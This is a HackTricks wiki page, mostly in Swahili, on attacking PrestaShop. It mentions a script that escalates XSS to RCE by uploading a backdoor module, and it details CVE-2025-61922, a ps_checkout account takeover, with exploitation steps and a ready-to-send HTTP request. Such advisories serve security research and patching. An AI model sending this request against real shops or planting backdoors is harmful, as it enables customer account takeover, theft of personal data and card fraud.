PrestaShop

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

From XSS to RCE

• PrestaXSRF: PrestaShop Exploitation Script ambayo inainua XSS hadi RCE au Other Critical Vulnerabilities. Kwa taarifa za ziada angalia this post. Inatoa support kwa PrestaShop Versions 8.X.X na 1.7.X.X, na inaruhusu:
• (RCE) PSUploadModule(); - Upload a custom Module: Pakia Persistent Module (backdoor) kwa PrestaShop.

ps_checkout ExpressCheckout silent login account takeover (CVE-2025-61922)

Missing identity validation in the ps_checkout module < 5.0.5 inamruhusu mshambuliaji asiyeidhinishwa kubadilisha session kwa mteja yeyote kwa kutoa email yao.

• Endpoint (unauth): POST /module/ps_checkout/ExpressCheckout.
• Flow: ExpressCheckout.php inapokea JSON ya mshambuliaji, inachunguza tu orderID, inajenga ExpressCheckoutRequest na inaita ExpressCheckoutAction::execute().
• Auth bug: Katika versions zilizo na vunjifu ExpressCheckoutAction inaita CustomerAuthenticationAction::execute() wakati hakuna user ameloga. Mbinu hiyo inafanya tu customerExists(<payer_email>) na context->updateCustomer(new Customer($id)), hivyo uwepo wa email == login (hakuna ukaguzi wa password/token).
• Attacker-controlled email field: order.payer.email_address ndani ya JSON payload inasomwa na ExpressCheckoutRequest::getPayerEmail().

Exploitation steps

1. Kusanya email yoyote ya mteja iliyosajiliwa (admin ni tofauti na haathiriwi na flow hii).
2. Tuma POST isiyoidhinishwa kwa controller na orderID pamoja na email ya mhanga kwenye order.payer.email_address.
3. Hata kama endpoint inarudisha 500, response itajumuisha cookies za context ya mteja wa mhanga (session tayari imesimbuliwa), ikiruhusu upatikanaji wa PII au kununua kwa kutumia saved cards.

POST /module/ps_checkout/ExpressCheckout HTTP/1.1
Host: `<target>`
Content-Type: application/json
Content-Length: 72

{"orderID":"1","order":{"payer":{"email_address":"victim@example.com"}}}

Marejeo

• CVE-2025-61922: Zero-Click Account Takeover on Prestashop (blogu)
• GitHub Advisory GHSA-54hq-mf6h-48xh

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.